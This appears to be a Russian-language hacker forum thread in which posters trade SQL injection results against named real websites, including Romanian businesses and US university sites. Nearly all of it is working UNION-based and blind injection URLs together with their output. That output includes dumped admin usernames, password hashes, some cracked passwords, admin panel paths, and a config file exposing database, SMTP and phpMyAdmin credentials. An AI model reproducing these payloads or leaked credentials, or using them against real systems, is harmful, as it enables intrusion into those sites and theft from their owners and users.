PageRank: 6 http://www.sa-venues.com/admin/ root:*34D244FE504DCCF2C76FE6089242805D0ADC267A Database Version: 4.1.14-nt Database name: yokel33 User name: [email protected]
PR2 http://www.jouanel.com/choix.php?lng=5&parent=-5+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user()),5-- Database Version: 5.0.32-Debian_7etch6-log Database name: jouanel User name: [email protected] сайт тоже румынский админка www.jouanel.com/admin/ еще интересно вот тут www.jouanel.com/admin.back/
PageRank: 5 ethaicdsecure:d^hxbjowrR^ipN0760 Database Version: 5.0.45 Database name: ethaicd User name: ethaicd@localhost PageRank: 5 вывод в шапке admin:admin Database Version: 5.0.51a-3ubuntu5.4-log Database name: olomoucgui User name: [email protected]
PR3 http://www.vaccin.ro/index.php?s=6&p=-13+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6-- Database Version: 4.1.22-log Database name: vaccin User name: vaccinuser@localhost
Database Version: 4.1.10a-nt-log Database name: omicron User name: [email protected] Database Version: 4.1.22-standard Database name: sarut User name: hostsaru@localhost root : *64AA67B0A3F7FBAFE6E4C07862C61EE66AFE40E6
PageRank: 5 admin:0429d0a901e5afb487e88c8fc2a95f17:billclinton Database Version: 5.0.51a-community Database name: jkcement_newjkcement User name: jkcement_newjk@localhost
http://www.abi-trade.ru/memory.php?id=-315%20union%20select%20version(),2,3,4-- Седня нефига не рыбный день, один сайт всего за 3 часа.. Ужос =)
http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,version(),user(),database()),3 Database Version: 5.0.37-standard Database name: dingalati_firme User name: dingalati_cis@localhost http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,username,password,email_address),3+from+dingalati_ads.ox_users compitserv:c478d1475034678fb22684a7443cd04f[email protected] http://firme.dingalati.ro/firme/347/index.php?id=8+union+select+1,concat_ws(0x3a,user_login,user_nicename,user_pass,user_email),3+from+dingalati_apg.wp_users admin:$P$BFljCZY9nDTLPm9Ey5C2SFJxMMp8qw.:admin:[email protected] Viorel:$P$BpftK2RsBOon8wGBgJRxy2tFr9PvRG/:viorel:[email protected]
Hosting / Indonesia PageRank: 3 http://www.solindohost.com/admin root:root webmaster:solindohost2005 userasswd Database Version: solindoh_solindoh Database name: 5.0.67-community User name: solindoh_newslh@localhost
Database Version: 4.1.21 Database name: aupcalendar User name: [email protected] /data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/form.php Читаем /etc/passwd Читаем /data/11/1/73/148/1073963/user/1112542/htdocs/aupcal2/cfg/config.php Получаем include_once("phpself_scriptname.fix.php"); define("dbname","aupcalendar"); define("hostname","205.178.146.23"); define("username","acandia2007"); define("password","AUPcal2007a"); define("smtpuser","acandia"); define("smtppass","paris"); define("mail","[email protected]"); define("adm_mail","[email protected]"); define("TEMPLATE_PATH","template"); define("date_of_install","2007-11-11"); Заходим в PHPMYADMIN http://205.178.146.23/ логин Admin пароль acandia2007b Админка
http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,version(),database(),user()),3-- Database Version: 5.0.67-community Database name: kstorer_kstore User name: kstorer_kstore@localhost http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,username,password),3+from+admins-- ralumihai:bdb8c008fa551ba75f8481963f2201da: tutu админка http://www.kstore.ro/admin/
Code: http://www.aui.edu/pr.php?id=-20071110%27+union+select+1,2,3,4,5,convert(version()+using+latin1),7,8,9,10,11,12,13,14/* 4.1.18-standard-log PR: 7 \\ээм, у меня поиск не работет
http://www.comunitati.net/no_login/index.php?modul=comunitati&categ=orase&id_tara=-6+union+select+1,concat_ws(0x3a,version(),database(),user()),3/* Version: 4.0.27-max-log Database: paulstaicu User: [email protected]
PR6 http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,concat(pw,0x3a,username),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user_logins+where+ID=1-- Если кто найдет админку куда подйдет логин и пасс- дайте знать, плиз. =) + UPD http://www2.ric.edu/news/displayNews.php?id=news-99999+union+select+concat(Username,0x3a,Password),2,3,4,5,6+from+int_users-- cberube:rainbow http://www2.ric.edu/admin/
По всей видимости пассы от галлереи, но она снесена, robots.txt тебе в руки. Не совсем то, но HTML: http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat_ws(0x3A,option_name,option_value)+SEPARATOR+0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+blogs.wp_president_options-- http://www.gatech.edu/blogs/president - wp(6.3) www.gatech.edu PageRank: 8 тИЦ: 850 вот юзеры HTML: http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat(user_pass,0x3A,user_login,0x3c62723e)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+blogs.wp_president_users-- $P$BTtoA2y6jOaVJGW3ImqzvO7tpPsqwg1:admin $P$BWlRTtFjpvji9sdoeZwxi/OG9a9iUe.:bryan $P$BKkhNwEyoo5vKYR54gIbnV9qFkMe4v0:michael хотя учитывая что в wp новых версий ну очень трудно побрутить хеш то это безсмыслено.
http://www.star-storage.ro/produse_detalii.asp?ID=11[SQL] Version: 5.0.51a-community-nt DataBase: star-storage User: star-storage@localhost Впервые встретил такую связку ASP+MySQL, гибрид.Поля выводимые не нашел, вывел все брутом, есть таблица users с колонками: UserName, password, user, parola. админка www.star-storage.ro/admin юзеров не брутил..времени и желания нет, кто хочет поковырятся ...вперёд. Удачи. З.Ы. Jokester извини за бояны.. моя ошибка
Database Version:4.0.18 User name:groth@localhost Database name:groth Database Version:4.1.22-standard User name:bragada_ebed@localhost Database name:bragada_ebed Database Version:4.1.22-log User name:ceke9mzd9e@localhost Database name:live_jazz Database Version: 5.0.67-log Database name: varsity_data User name: varsity_user@localhost
RP5 turner:fooBar mmsa:slazNEL 4.1.22-standard mmsa_mmsa@localhost mmsa_mmsa ******************************************** PR4 Database Version: 5.0.45 Database name: veeteecom User name: veeteecom@localhost Админка: http://www.veeteedinein.co.uk/admin/ admin1:u#ddaa!212@mmcom
http://www.rfrap.ru Сайт Ростовского филиала Российской академии правосудия=) юзер: http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),1,1)))=114 r http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),2,1)))=102 f http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),3,1)))=114 r http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),4,1)))=97 a http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),5,1)))=112 p http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),6,1)))=64 @ http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),7,1)))=108 l http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),8,1)))=111 o http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),9,1)))=99 c http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),10,1)))=97 a http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),11,1)))=108 l http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),12,1)))=104 h http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),13,1)))=111 o http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),14,1)))=115 s http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),15,1)))=116 t http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(user(),16,1)))=0 бд http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),1,1)))=114 r http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),2,1)))=102 f http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),3,1)))=114 r http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),4,1)))=97 a http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),5,1)))=112 p http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(database(),6,1)))=0 версия mysql http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),1,1)=3 3 http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),2,1)=0 0 http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),3,1)=2 2 http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),4,1)=3 3 P.S. Простите, что так много=) P.P.S. Уффф=)